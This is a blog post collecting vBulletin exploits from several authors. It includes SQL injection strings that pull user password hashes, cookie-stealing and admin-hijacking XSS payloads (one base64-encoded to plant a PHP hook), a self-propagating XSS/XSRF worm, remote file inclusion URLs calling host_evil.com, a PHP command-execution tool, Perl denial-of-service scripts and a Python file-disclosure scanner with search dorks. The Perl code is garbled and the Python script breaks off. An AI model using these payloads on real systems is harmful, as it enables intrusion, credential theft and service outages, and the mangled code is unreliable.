sábado, 7 de abril de 2012

VBULLETIN EXPLOITS

Pokleyzz/vbulletin306.txt

Código:
Summary: vbulletin 3.0.6 and below php code injection
 
Description
===========
vBulletin is a powerful, scalable and fully customizable forums package  
for your web site. It has been written using the Web's quickest-growing  
scripting language; PHP, and is complimented with a highly efficient and  
ultra fast back-end database engine built using MySQL.
 
Details
=======
User may inject php code using "nested variable" into template name when   
"Add Template Name in HTML Comments" is enable. This option is not enable  
by default and is not recomended by vbulletin for production environment.  
The problem occur when user may supply partial template name through  
misc.php.
 
 
Workaround
==========
Disable "Add Template Name in HTML Comments" option.
 
Proof of concept
================
http://site.com/misc.php?do=page&template={${phpinfo()}}
 
Vendor Response
===============
17th February 2005 - Vulnerability found
18th February 2005 - vbulletin developer informed
19th February 2005 - vbulletin developer confirmed
20th February 2005 - Fix Available from vbulletin team
vBulletin versions 3.0.6 and below suffer from a php code injection vulnerability.




meto5757/vbulletin-sql.txt

Código:
/****************************************/
 
CREDIT:
discovered by meto5757 and disfigure
 
PRODUCT:
vBulletin
http://www.vbulletin.com/
 
VULNERABILITY:
SQL Injection
 
NOTES:
- not a serious vulnerability, can only be used by administrator of site
- SQL injection can be used to obtain password hash
- tested on 3.6.4 and 3.6.5
 
POC:
1. Log in to admin panel
2. Go to Attachments->Search
3. Place the following string in the Attached Before field:
 
') union select 1,1,1,1,1,userid,password,1,username from user -- 9
 
greets: w4ck1ng.com
 
/****************************************
vBulletin suffers from a SQL injection flaw via the admin panel.

Liz0ziM/vbulletin352.txt 

Código:
Vulnerable Version: 3.5.2 (prior versions also may be affected) Bug: Html_Injection (Second order Cross_Site_Scripting) Exploitation: Remote with browser
 
 
Html_Injection : The software does not properly filter HTML tags in the title of events before being passed to user in 'calendar.php'&'reminder.php AS include'. that may allow a remote user to inject HTML/javascript codes to events of calendar. The hostile code may be rendered in the web browser of the victim user who will Request Reminder for those Events (persistent). For example an attacker creates new event (Single-All Day Event , Ranged Event OR Recurring Event)with this content: 
 
 
TITLE:--------->Test<script>alert(document.cookie)</script> BODY:---------->No matter OTHER OPTIONS:->No matter
 
 
Demonstration XSS URL: -------------------- http://example.com/vbulletin/calendar.php?do=addreminder&amp;e=[eventid]
 
Credit
 
Savsak.com [Ejder And The_BeKiR And Liz0Zim And CyberLord]
vBulletin version 3.5.2 is susceptible to cross site scripting attacks.

insanity/vbulletin361.txt

Código:
Author: insanity
E-mail: insanity@darkers.com.br
 
XSS vBulletin 3.6.1 Admin Control Panel
 
http://www.exemplo.com/vbulletin/admincp/index.php?do=buildnavprefs&amp;nojs=0&amp;prefs="><script>alert("insanity")</script>
http://www.exemplo.com/vbulletin/admincp/index.php?do=savenavprefs&amp;nojs=0&amp;navprefs="><script>alert("insanity")</script>

vBulletin version 3.6.1 suffers from a cross site scripting flaw in the Admin Control Panel.
imei addmimistrator/vbulletinXSSpasswd.txt 

Código:
——–Summary——–
Software: vBulletin
Sowtware’s Web Site: http://www.vBulletin.com
Versions: 3.0.12-3.5.3
Class: Remote
Status: Unpatched
Exploit: Available
Solution: Available
Discovered by: imei addmimistrator
Risk Level: Mediume
——-Description——-
There is a security bug in most powerfull &amp; common forum software vBulletin version 3.0.12&amp;3.5.3 that allows attacker performe a XSS attack. bug is in result of unsentizing quotation and < &amp; > characters for “email” field of users’ information. a weak regular expression for validation email that allows insertiong unvalid characters in domain-name section of email is source of this bug and also forgot to htmlspeacialcharing output value in sendmsg.php file, helps exploiting this bug. a successfull attack can result to thefthing cookies, hijacking pages and etc…
——-Conditions——-
AdminSetting Should meeted these settings:
Enable Email features=Yes
Allow Users to Email Other Members=Yes
Use Secure Email Sending=No
forum/admins/options.php?do=options&amp;dogroup=email
It sounds that conditions are defaultly OK;
——-Exploit——-
Scenario:
/forum/profile.php?do=editpassword
pass:your pass
email: imei@myimei.com”><script>alert(1)</script>.nomatt
Note About lenght limitation 
****
forum/profile.php?do=editoptions
Receive Email from Other Members=yes
****
forum/sendmessage.php?do=mailmember&amp;u={your id}
——-Solution——-
Upgrade to vendore provided patch.
——-Credit——-
Discovered by: imei addmimistrator
addmimistrator(4}gmail(O}com
vBulletin versions 3.0.12 through 3.5.3 are susceptible to cross site scripting.

Jessica Hope/vbulletin-adminxss.txt 

Código:
======================================================================
 
Advisory : XSS in admin logs
Release Date : July 06th 2008
Application : vBulletin
Version : vBulletin 3.7.2 and lower, vBulletin 3.6.10 PL2 and lower
Platform : PHP
Vendor URL : http://www.vbulletin.com/
Authors : Jessica Hope (jessicasaulhope@googlemail.com),
Friends who wish to remain anonymous.
 
 
=======================================================================
 
Overview
 
Due to various failures in sanitising user input, it is possible to
construct XSS attacks that are rather damaging.
 
=======================================================================
 
Discussion
 
The XSS in question exists on the log viewing page of the admin control panel.
 
When a missing page is requested, a log is created in the admin area, however
the inputs to this log lack sanitation. The script name is taken from
basename(PHP_SELF), while the action is taken from _REQUEST['do']. Either one
can be used for introducing XSS vectors.
 
To highlight the severity and underline the fact that his vulnerability is
exploitable:
 
<html>
<body>
<img src="http://localhost/vB/upload/admincp/faq.php/0?do=<script>/*" />
<img src="http://localhost/vB/upload/admincp/faq.php/1?do=*/a%3D'document.wri'/*"
/>
<img src="http://localhost/vB/upload/admincp/faq.php/2?do=*/b%3D'te(%22<script
'/*" />
<img src="http://localhost/vB/upload/admincp/faq.php/3?do=*/c%3D'src=http://'/*"
/>
<!--edit to match your data -->
<img src="http://localhost/vB/upload/admincp/faq.php/4?do=*/d%3D'localhost/'/*"
/>
<img src="http://localhost/vB/upload/admincp/faq.php/5?do=*/e%3D''/*" />
<img src="http://localhost/vB/upload/admincp/faq.php/6?do=*/f%3D't.js></scrip'/*"
/>
<!-- end edit -->
<img src="http://localhost/vB/upload/admincp/faq.php/7?do=*/g%3D't>%22)'/*" />
<img src="http://localhost/vB/upload/admincp/faq.php/8?do=*/h%3Da%2Bb%2Bc%2Bd%2Be%2Bf%2Bg/*"
/>
<img src="http://localhost/vB/upload/admincp/faq.php/9?do=*/eval(h)/*" />
<img src="http://localhost/vB/upload/admincp/faq.php/a0?do=*/</script>" />
</body>
</html>
 
You then need to send the admin to
adminlog.php?do=view&amp;script=&amp;u=0&amp;pp=15&amp;orderby=script&amp;page=1
and the XSS will render.
 
The limits on the XSS:
basename(PHP_SELF) is 50 characters max and no slashes
_REQUEST['do'] is limited to 20 characters, but no character restriction.
 
The tight character limits on the unsanitized parameters are not
mitigating the severity, as unlimited
attack space can be obtained as shown above.
 
As per my last exploits, all XSS in the vBulletin ACP can be used for
PHP injection instantly. This
is due to the design of the vBulletin hooks feature. As this
particular XSS is persistent and will
render in all major browsers it is particularly dangerous.
 
=======================================================================
 
Solution:
 
Update to vBulletin 3.7.2 PL1 or vBulletin 3.6.10 PL3
 
Don't trust PHP_SELF and sanitise all data that is going to be
displayed to the user
 
=======================================================================
vBulletin versions 3.7.2 and below and 3.6.10 PL2 and below suffer from a persistent cross site scripting flaw in the administrator logs.

Jessica Hope/vbulletin-xss.txt 

Código:
======================================================================
 
Advisory : Exploit for vBulletin "obscure" XSS
Release Date : June 13th 2008
Application : vBulletin
Version : vBulletin 3.7.1 and lower, vBulletin 3.6.10 and lower
Platform : PHP
Vendor URL : http://www.vbulletin.com/
Authors : Jessica Hope (jessicasaulhope@googlemail.com)
 
 
=======================================================================
 
Overview
 
Due to various failures in sanitising user input, it is possible to
construct XSS attacks that are rather damaging.
 
=======================================================================
 
Discussion
 
vBulletin released PL1 for their 3.7.1 and 3.6.10 versions of vBulletin:
http://www.vbulletin.com/forum/showthread.php?t=274882
 
In the above topic they try to pass off the XSS as difficult to exploit,
with low exposure and damage. This advisory is here to detail what the
XSS is and how wrong Jelsoft are for assuming that XSS is harmless.
 
First, the discussion of exactly what the exploit is. The XSS in question
exists on the login page for the ACP (admin control panel). The login
script takes a redirect parameter that lacks sanitation, allowing a
rather easy XSS:
 
http://localhost/vB3/admincp/index.php?redirect={XSS}
 
Yes, here goes the obscure. What is even better is that the exploit will
work outright if the admin is already logged in; if the admin is not, they
will be required to log in. If you Base64-encode your attack vector using
the data: URI scheme, the XSS survives the login request and activates after
the admin is logged in. A simple example of the above:
 
http://localhost/vB3/admincp/index.php?redirect=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K
 
Now to address the quote "potential for exposure and damage is limited".
Clearly Jelsoft have never seen what one can do with an XSS. In this case
you have an unlimited and unaltered XSS space, so you're free to invoke some
AJAX and have fun. Just to give ideas on how this could turn into something
larger, vBulletin has hooks that operate using eval(), and new hooks can
be added via the ACP itself. It is trivial to write some JS that not only
enables hooks but also inserts a nice RFI hook. Here's one using the data
URI:
 
data:text/html;base64,PHNjcmlwdD5ldmFsKCJ1PSdhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQnO2M9J0NvbnRlbnQtdHlwZSc7ZD0nQ29udGVudC1sZW5ndGgnO3JlZz0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7cmVnLm9wZW4oJ0dFVCcsICdodHRwOi8vbG9jYWxob3N0L3ZCL3VwbG9hZC9hZG1pbmNwL3BsdWdpbi5waHA/ZG89YWRkJywgZmFsc2UpO3JlZy5zZW5kKG51bGwpO3IgPSByZWcucmVzcG9uc2VUZXh0O3Q9J2h0dHA6Ly9sb2NhbGhvc3QvdkIvdXBsb2FkL2FkbWluY3AvcGx1Z2luLnBocCc7aD0nJmFkbWluaGFzaD0nK3Iuc3Vic3RyKHIuaW5kZXhPZignaGFzaFwiJykrMTMsMzIpO3RvPScmc2VjdXJpdHl0b2tlbj0nK3Iuc3Vic3RyKHIuaW5kZXhPZigndG9rZW5cIicpKzE0LDQwKTt0Mj0ncHJvZHVjdD12YnVsbGV0aW4maG9va25hbWU9Zm9ydW1ob21lX3N0YXJ0JmRvPXVwZGF0ZSZ0aXRsZT1mb28mZXhlY3V0aW9ub3JkZXI9MSZwaHBjb2RlPXBocGluZm8oKTsmYWN0aXZlPTEnK2grdG87cjIgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtyMi5vcGVuKCdQT1NUJywgdCwgZmFsc2UpO3IyLnNldFJlcXVlc3RIZWFkZXIoZCwgdDIubGVuZ3RoKTtyMi5zZXRSZXF1ZXN0SGVhZGVyKGMsdSk7cjIuc2VuZCh0Mik7dD0naHR0cDovL2xvY2FsaG9zdC92Qi91cGxvYWQvYWRtaW5jcC9vcHRpb25zLnBocCc7dDI9J2RvPWRvb3B0aW9ucyZzZXR0aW5nW2VuYWJsZWhvb2tzXT0xJytoK3Rv
 O3IyPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtyMi5vcGVuKCdQT1NUJyx0LGZhbHNlKTtyMi5zZXRSZXF1ZXN0SGVhZGVyKGQsdDIubGVuZ3RoKTtyMi5zZXRSZXF1ZXN0SGVhZGVyKGMsdSk7cjIuc2VuZCh0Mik7Iik8L3NjcmlwdD4K
 
 
The above will survive a login prompt. It will then, once executed, proceed
to parse one of the ACP pages and extract the admin hash and token, then
it will enable hooks and add one that executes phpinfo().
 
In order to exploit, just get an admin to click the link. It's easier
than Jelsoft would expect...
 
=======================================================================
 
Solution
 
Per usual, update to 3.7.1 PL1 or 3.6.10 PL1
 
For the vendor, however, the solution to such things in the future is to
never call an exploit obscure, and never write "the potential for exposure
and damage is limited" when talking about an XSS. Above all, give credit where
credit is due, for there's no quicker way to piss someone off than to not give
credit. If the above was due to your PR department, then ignore them next time,
for handling exploits with PR is never a good idea.
 
=======================================================================
vBulletin versions 3.7.1 and below and 3.6.10 and below suffer from an obscure cross site scripting vulnerability.

Mx/vbulletin-xssxsrf.txt 

Código:
/* -----------------------------
 * Author      = Mx
 * Title       = vBulletin 3.7.3 Visitor Messages XSS/XSRF + worm
 * Software    = vBulletin
 * Addon       = Visitor Messages
 * Version     = 3.7.3
 * Attack      = XSS/XSRF
 
 - Description = A critical vulnerability exists in the new vBulletin 3.7.3 software which comes included
 + with the visitor messages addon (a clone of a social network wall/comment area).
 - When posting XSS, the data is run through htmlentities(); before being displayed
 + to the general public/forum members. However, when posting a new message,
 - a new notification is sent to the commentee. The commenter posts a XSS vector such as
 + <script src="http://evilsite.com/nbd.js">, and when the commentee visits usercp.php
 - under the domain, they are hit with an unfiltered xss attach. XSRF is also readily available
 + and I have included an example worm that makes the user post a new thread with your own
 - specified subject and message.
 
 * Enjoy. Greets to Zain, Ytcracker, and http://digitalgangster.com which was the first subject
 * of the attack method.
 * ----------------------------- */
 
function getNewHttpObject() {
var objType = false;
try {
objType = new ActiveXObject('Msxml2.XMLHTTP');
} catch(e) {
try {
objType = new ActiveXObject('Microsoft.XMLHTTP');
} catch(e) {
objType = new XMLHttpRequest();
}
}
return objType;
}
 
function getAXAH(url){
 
var theHttpRequest = getNewHttpObject();
theHttpRequest.onreadystatechange = function() {processAXAH();};
theHttpRequest.open("GET", url);
theHttpRequest.send(false);
 
function processAXAH(){
if (theHttpRequest.readyState == 4) {
if (theHttpRequest.status == 200) {
 
var str = theHttpRequest.responseText;
var secloc = str.indexOf('var SECURITYTOKEN = "');
var sectok = str.substring(21+secloc,secloc+51+21);
 
var posloc = str.indexOf('posthash" value="');
var postok = str.substring(17+posloc,posloc+32+17);
 
var subject = 'subject text';
var message = 'message text';
 
postAXAH('http://digitalgangster.com/4um/newthread.php?do=postthread&amp;f=5', 'subject=' + subject + '&amp;message=' + message + '&amp;wysiwyg=0&amp;taglist=&amp;iconid=0&amp;s=&amp;securitytoken=' + sectok + '&amp;f=5&amp;do=postthread&amp;posthash=' + postok + 'poststarttime=1&amp;loggedinuser=1&amp;sbutton=Submit+New+Thread&amp;signature=1&amp;parseurl=1&amp;emailupdate=0&amp;polloptions=4');
 
}
}
}
}
 
 
 
 
 
 
 
 
function postAXAH(url, params) {
var theHttpRequest = getNewHttpObject();
 
theHttpRequest.onreadystatechange = function() {processAXAHr(elementContainer);};
theHttpRequest.open("POST", url);
theHttpRequest.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded; charset=iso-8859-2');
theHttpRequest.send(params);
 
function processAXAHr(elementContainer){
if (theHttpRequest.readyState == 4) {
if (theHttpRequest.status == 200) {
 
}
}
}
}
 
 
getAXAH('http://digitalgangster.com/4um/newthread.php?do=newthread&amp;f=5');
document.write('<iframe src="http://digitalgangster.com/4um/newthread.php?do=newthread&amp;f=5">');
The Visitor Messages add-on for vBulletin version 3.7.3 suffers from cross site scripting and cross site request forgery vulnerabilities. This is a worm exploit that takes advantage of these issues.

mslug/vbulletinSQL.txt 

Código:
vBulletin Forum 2.3.xx calendar.php SQL Injection
========================================================
Website: www.safechina.net
Discovered by: mslug (a1476854@hotmail.com)
 
Description:
=============
There exist a sql injection problem in calendar.php. Notice the eventid 
field.
 
-------- Cut from line 585 in calendar.php ----------
else if ($action == "edit")
{
      $eventinfo = $DB_site->query_first("SELECT 
allowsmilies,public,userid,eventdate,event,subject FROM calendar_events 
WHERE eventid = $eventid");
-----------------------------------------------------
 
If the MySQL version is greater than 4.00, a UNION attack could be used.
 
Exploit request
================
calendar.php?s=&amp;action=edit&amp;eventid=14 union (SELECT 
allowsmilies,public,userid,'0000-0-0',version(),userid FROM calendar_events 
WHERE eventid = 14) order by eventdate
 
(14 is the eventid of your added event)
 
The subject and event field will show the result.
 
The query_first function will only return the first row of the query result, 
so make sure it returns the
one you want.
 
The Fix?
============
filter eventid before query.
 
 
Disclaimer:
===========
The author is not responsible for the misuse of the information
provided in this advisory. The opinions expressed are my own and not of
any company. In no event shall the author be liable for any damages
whatsoever arising out of or in connection with the use or spread of this
advisory. Any use of the information is at the user's own risk.
 
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 
_________________________________________________________________
Protect your PC - get McAfee.com VirusScan Online 
http://clinic.mcafee.com/clinic/ibuy/campaign.asp?cid=3963
vBulletin Forum versions 2.3.x suffer from a SQL injection vulnerability in the calendar.php code. Remote exploitation code included.

Dr.Jr7/VBulletinImpEx.txt 

Código:
Remote File Inclusion in VBulletin ImpEx 
 
Date : 
 
12 / 4 / 2006 
 
Software :  
 
VBulletin ImpEx 
 
version : 
 
VBulletin 3.5.1
VBulletin 3.5.2
VBulletin 3.5.4
 
The bug reside in  : 
 
ImpExModule.php
ImpExController.php
ImpExDisplay.php
 
Exploit : 
 
(1)
www.site.com/forum/impex/ImpExModule.php?systempath=http://www.host_evil.com/cmd?&amp;=id
 
(2)
www.site.com/forum/impex/ImpExController.php?systempath=http://www.host_evil.com/cmd?&amp;=id
 
(3)
www.site.com/forum/impex/ImpExDisplay.php?systempath=http://www.host_evil.com/cmd?&amp;=id
 
Discovery by :
 
Dr.Jr7
 
GreeTz : 
 
special greet to Qptan &amp; Mr.SNAKE  &amp; trooq
 
and to my all frinds in www.lezr.com/vb
 
see u :}
VBulletin ImpEx suffers from a remote file inclusion vulnerability. POC included.

Hasadya Raed/vbulletin365-rfi.txt 

Código:
By Hasadya Raed
Contact : RaeD (at) BsdMail (dot) Com [email concealed] - Israel
Greetz : -Fairoz- 
-----------------------------------
vBulletin v3.6.5
Dork : "Powered by vBulletin v3.6.5. Copyright ©2000 - 2007 "
-----------------------------------
Exploits :
 
Http://WWW.Victim.Com/vb/includes/functions.php?classfile=[Shell-Attack]
 
Http://WWW.Victim.Com/vb/includes/functions_cron.php?nextitem=[Shell-Att
ack]
 
Http://WWW.Victim.Com/vb/includes/functions_forumdisplay.php?specialtemp
lates=[Shell-Attack]
 
Discovred By Hasadya Raed 
Have A Good Time
 
[ reply ]
vBulletin version 3.6.5 suffers from remote file inclusion vulnerabilities.

HACKERS PAL/Vbulletin-2.x.txt 

Código:
Hello,,
 
Vbulletin 2.X sql injection
 
Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@soqor.net
 
This is sql injection in vbulletin systems
 
the injection is in the global.php file
 
we can use it 
 
global.php?templatesused=))/*
 
the query will be 
SELECT template,title FROM template WHERE (title IN ('))/*','gobutton','timezone','username_loggedout','username_loggedin','phpinclude','headinclude','header','footer','forumjumpbit','forumjump','nav_linkoff','nav_linkon','navbar','nav_joiner','pagenav','pagenav_curpage','pagenav_firstlink','pagenav_lastlink','pagenav_nextlink','pagenav_pagelink','pagenav_prevlink') AND (templatesetid=-1 OR templatesetid=1)) ORDER BY templatesetid
 
global.php?templatesused=nn,dd,'))/*
SELECT template,title FROM template WHERE (title IN ('nn','dd','\\\'))/*','gobutton','timezone','username_loggedout','username_loggedin','phpinclude','headinclude','header','footer','forumjumpbit','forumjump','nav_linkoff','nav_linkon','navbar','nav_joiner','pagenav','pagenav_curpage','pagenav_firstlink','pagenav_lastlink','pagenav_nextlink','pagenav_pagelink','pagenav_prevlink') AND (templatesetid=-1 OR templatesetid=1)) ORDER BY templatesetid
 
It Can be used as shell injection
 
Tested on VB 2.3.X and other versions are injected ..(2.X)
 
#WwW.SoQoR.NeT
Vbulletin 2.X suffers from a flaw in global.php that allows for SQL injection.

ReZEN/vBulletin174.txt

Código:
=======================================================================================
XOR Crew :: Security Advisory 
       3/22/2006
=======================================================================================
vBulletin ImpEx <= 1.74 - Remote Command Execution Vulnerability
=======================================================================================
http://www.xorcrew.net/
http://www.xorcrew.net/ReZEN
=======================================================================================
 
:: Summary
 
       Vendor       :  vBulletin
       Vendor Site  :  http://www.vbulletin.com/docs/html/impex
       Product(s)   :  Impex - vBulletin Import / Export System
       Version(s)   :  All
       Severity     :  Medium/High
       Impact       :  Remote Command Execution
       Release Date :  3/22/2006
       Credits      :  ReZEN (rezen (a) xorcrew (.) net)
 
=======================================================================================
 
I. Description
 
The ImpEx (Import / Export) system is the core system for importing from 
other forum software into vBulletin version 3.5.0 or higher.
 
=======================================================================================
 
II. Synopsis
 
There is a remote file inclusion vulnerability that allows for remote 
command execution in the /ImpExData.php file.  The bug is here:
 
require_once ($systempath . 'impex/ImpExDatabase.php');
 
the $systempath variable is not set prior to being used in the 
require_once() function. The vendor and support team have been contacted.
 
=======================================================================================
 
Exploit code:
 
-----BEGIN-----
 
<?php
/*
vbulletin ImpEx Remote File Inclusion Exploit c0ded by ReZEN
Sh0uts: xorcrew.net, ajax, gml, #subterrain, My gf
url:  http://www.xorcrew.net/ReZEN
 
example:
turl: http://www.target.com/impex/ImpExData.php?systempath=
hurl:http://www.pwn3d.com/evil.txt?
 
*/
 
$cmd = $_POST["cmd"];
$turl = $_POST["turl"];
$hurl = $_POST["hurl"];
 
$form= "<form method=\"post\" action=\"".$PHP_SELF."\">"
     ."turl:<br><input type=\"text\" name=\"turl\" size=\"90\" 
value=\"".$turl."\"><br>"
     ."hurl:<br><input type=\"text\" name=\"hurl\" size=\"90\" 
value=\"".$hurl."\"><br>"
     ."cmd:<br><input type=\"text\" name=\"cmd\" size=\"90\" 
value=\"".$cmd."\"><br>"
     ."<input type=\"submit\" value=\"Submit\" name=\"submit\">"
 
     ."</form><HR WIDTH=\"650\" ALIGN=\"LEFT\">";
 
if (!isset($_POST['submit']))
{
 
echo $form;
 
}else{
 
$file = fopen ("test.txt", "w+");
 
fwrite($file, "<?php system(\"echo ++BEGIN++\"); system(\"".$cmd."\");
system(\"echo ++END++\"); ?>");
fclose($file);
 
$file = fopen ($turl.$hurl, "r");
if (!$file) {
     echo "<p>Unable to get output.\n";
     exit;
}
 
echo $form;
 
while (!feof ($file)) {
     $line .= fgets ($file, 1024)."<br>";
     }
$tpos1 = strpos($line, "++BEGIN++");
$tpos2 = strpos($line, "++END++");
$tpos1 = $tpos1+strlen("++BEGIN++");
$tpos2 = $tpos2-$tpos1;
$output = substr($line, $tpos1, $tpos2);
echo $output;
 
}
?>
 
 
------END------
 
=======================================================================================
 
IV. Greets :>
 
All of xor, Infinity, stokhli, ajax, gml, cijfer, my beautiful girlfriend.
 
uh ohs!! + /srv/web/lotfree/ + LOTFREE uid 1010 = Lame Frenchies
 
=======================================================================================
Versions 1.74 and below of the ImpEx module for vBulletin are susceptible to a remote command execution vulnerability. Exploit included.

Jim Salim/vBulletin DOS - all version

Código Perl:
# DOS Vbulletin 92% Works ;)
#
# Tested on all versions! and can DOS the server
#
#Perl Script 
use Socket;
if (@
ARGV 2) { &usage $rand=rand(10); $host $ARGV[0]; $dir $ARGV[1]; $host =~ s/(http://)//eg; for ($i=0$i<10$i--)
$user="vb".$rand.$i$data "s=" $len length $data$foo "POST ".$dir."index.php HTTP/1.1\r\n""Accept: */*\r\n""Accept-Language: en-gb\r\n""Content-Type: application/x-www-form-urlencoded\r\n""Accept-Encoding: gzip, deflate\r\n""User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n""Host: $host\r\n""Content-Length: $len\r\n""Connection: Keep-Alive\r\n""Cache-Control: no-cache\r\n\r\n""$data"my $port "80"my $proto getprotobyname('tcp'); socket(SOCKETPF_INETSOCK_STREAM$proto); connect(SOCKETsockaddr_in($portinet_aton($host))) || redosend(SOCKET,"$foo"0); syswrite STDOUT"+" ;
}
print 
"\n\n"system('ping $host'); sub usage {
print 
"\tusage: \n";
print 
"\t$0 <host> </dir/>\n";
print 
"\tex: $0 127.0.0.1 /forum/\n";
print 
"\tex2: $0 127.0.0.1 /\n\n";
exit();
};  
R3d-D3V!L/vBulletin Denial of Service Vulnerability 

Código Perl:
#!/c:/perl/bin
#

# VBulletin Denail of Service Exploit by 4.!.5
#
# created : !N 7h3 DARKNESS
# CODED BY: R3d-D3V!L
#
# important => Image Verification in (search.php) is NOT Enabled.
# It tested on V3.6.3
#
#Perl Script 
use Socket;
if (@
ARGV 2) { &usage $rand=rand(10); $host $ARGV[0]; $dir $ARGV[1]; $host =~ s/(http://)//eg; for ($i=0$i<10$i--)
$user="vb".$rand.$i$data "s=" $len length $data$foo "POST ".$dir."index.php HTTP/1.1\r\n""Accept: */*\r\n""Accept-Language: en-gb\r\n""Content-Type: application/x-www-form-urlencoded\r\n""Accept-Encoding: gzip, deflate\r\n""User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n""Host: $host\r\n""Content-Length: $len\r\n""Connection: Keep-Alive\r\n""Cache-Control: no-cache\r\n\r\n""$data"my $port "80"my $proto getprotobyname('tcp'); socket(SOCKETPF_INETSOCK_STREAM$proto); connect(SOCKETsockaddr_in($portinet_aton($host))) || redosend(SOCKET,"$foo"0); syswrite STDOUT"+" ;
}
print 
"\n\n"system('ping $host'); sub usage {
print 
"\tusage: \n";
print 
"\t$0 <host> </dir/>\n";
print 
"\tex: $0 127.0.0.1 /forum/\n";
print 
"\tex2: $0 127.0.0.1 /\n\n";
exit();
}; 
# Exploit By 4.!.5...




######################################################

  
[~]-----------------------------{D3V!L5 0F 7h3 SYS73M!?!}----------------------------------

[~] 
Greetz tOdolly L!TTLE 547r 0r45hy DEV!L_MODY po!S!ON Sc0rp!0N mAG0ush_1987
  
[~]70 ALL ARAB!AN HACKER 3X3PT LAM3RZ
  
[~] spechial thanks ab0 mohammed XP_10 h4CK3R JASM!c0prA MARWA N0RHAN S4R4
  
[?]spechial SupP0RTMY M!ND ;) & dookie2000ca & ((OFFsec))

[?]
4r48!4n.!nforma7!0N.53cur!7y ---> ((r3d D3v!L))--M2Z--DEV!L_Ro07--JUPA
  
[~]spechial FR!ND74M3M
  
[~] !M 4R48!4N 3XPL0!73R.

[~] {[(
D!R 4ll 0R D!E)]};

[~]--------------------------------------------------------------------------------  
 jiko/vBulletin Adsense SQL Injection 

Código:
------------------------------
[»]JIKO
[»]No-exploit.Com
[»]Composant Of Vbulletin
--------------
[»]EXPLOIT
viewpage.php?do=show&amp;id=-1 union select 0,1,2--
viewpage.php?do=show&amp;id=-1 union select 0,user(),2--
-------------------
 
you can select the password and username from users table of Forum
vbulletin for admin or any user
and dont forgget the Salt is very imporatant
-------------------
example :
http://www.alahsaa.net/vb/viewpage.php?do=show&amp;id=-1%20union%20select%200,2,3--
 
________________________________
Avec Internet Explorer, surfez en toute discrétion sur internet Cliquez ici !<http://clk.atdmt.com/FRM/go/182932252/direct/01/>
vBulletin Adsense suffers from a remote SQL injection vulnerability.

TinKode/vBulletin File Disclosure Exploit 

Código Python:
#! /usr/bin/env python3.1
#
################################################################
#                ____        _ _      _   _ (validator.php)    #
#               |  _ \      | | |    | | (_)                   #
#         __   _| |_) |_   _| | | ___| |_ _ _ __               #
#         \ \ / /  _ <| | | | | |/ _ \ __| | '_ \              #
#          \ V /| |_) | |_| | | |  __/ |_| | | | |             #
#           \_/ |____/ \__,_|_|_|\___|\__|_|_| |_|             #
#                                   @expl0it...                #
################################################################
#       [ vBulletin Files / Directories Full Disclosure ]      #
#    [ Vuln discovered by TinKode / xpl0it written by cmiN ]   #
#           [ Greetz: insecurity.ro, darkc0de.com ]            #
################################################################
#                                                              #
#                  Special thanks for: cmiN                    #
#                  www.TinKode.BayWords.com                    #
################################################################

  
import ossysurllib.requesturllib.parsethreading


def main
():
    
logo """
\t |---------------------------------------------------------------|
\t |                 ____        _ _      _   _     (TM)           |
\t |                |  _ \      | | |    | | (_)                   |
\t |          __   _| |_) |_   _| | | ___| |_ _ _ __               |
\t |          \ \ / /  _ <| | | | | |/ _ \ __| | '_ \              |
\t |           \ V /| |_) | |_| | | |  __/ |_| | | | |             |
\t |            \_/ |____/ \__,_|_|_|\___|\__|_|_| |_|             |
\t |                                                               |
\t |               vBulletin Full Disclosure expl0it               |
\t |                      Written by cmiN                          |
\t |              Vulnerability discovered by TinKode              |
\t |                                                               |
\t |              Dork: intext:"
Powered by vBulletin"              |
\t |          Visit: www.insecurity.ro &amp; www.darkc0de.com          |
\t |---------------------------------------------------------------|
"""
    
usage """
         |---------------------------------------------------------------|
         |Usage:  vbfd.py scan http://www.site.com/vB_folder             |
         |        vbfd.py download *.sql -> all                          |
         |        vbfd.py download name.jpg -> one                       |
         |---------------------------------------------------------------|"""
    
if sys.platform in ("linux""linux2"):
        
clearing "clear"
    
else:
        
clearing "cls"
    
os.system(clearing)
    print(
logo)
    
args sys.argv
    
if len(args) == 3:
        try:
            print(
"Please wait...")
            if 
args[1] == "scan":
                
extract_parse_save(args[2].strip("/"))
            
elif args[1] == "download":
                
download_data(args[2])
        
except Exception as message:
            print(
"An error occurred: {}".format(message))
        
except:
            print(
"Unknown error.")
        else:
            print(
"Ready!")
    else:
        print(
usage)
    
input()

  
def extract_parse_save(url):
    print(
"[+]Extracting content...")
    
hurl url "/validator.php"
    
with urllib.request.urlopen(hurl) as usock:
        
source usock.read().decode()
    print(
"[+]Finding token...")
    
word "validate('"
    
source source[source.index(word) + len(word):]
    
value source[:source.index("'")]
    print(
"[+]Obtaining paths...")
    
hurl url "/validator.php?op={}".format(value)
    
with urllib.request.urlopen(hurl) as usock:
        
lastklastv NoneNone
        dictionary 
dict()
        for 
line in usock:
            
line line.decode()
            
index line.find("<td>")
            if 
index != -1:
                
lastk line[index 4:line.index("</td>")].strip(" ")
            
index line.find("<strong>")
            if 
index != -1:
                
lastv line[index 8:line.index("</strong>")].strip(" ")
            if 
lastk != None and lastv != None:
                
index lastk.rfind(".")
                if 
index in (-10):
                    
lastk "[other] {}".format(lastk)
                else:
                    
lastk "[{}] {}".format(lastk[index 1:], lastk)
                
dictionary[lastk] = lastv
                lastk
lastv NoneNone
    
print("[+]Organizing and saving paths...")
    
with open("vBlogs.txt""w") as fout:
        
fout.write(url "\n")
        
keys sorted(dictionary.keys())
        for 
key in keys:
            
fout.write("{} ({})\n".format(keydictionary[key]))

  
def download_data(files):
    print(
"[+]Searching and downloading files...")
    
mthreads 50
    with open
("vBlogs.txt""r") as fin:
        
url fin.readline().strip("\n")
        if 
files.find("*") == -1:
            
hurl url "/" files.strip("/")
            
Download(hurl).start()
        else:
            
ext files[files.rindex(".") + 1:]
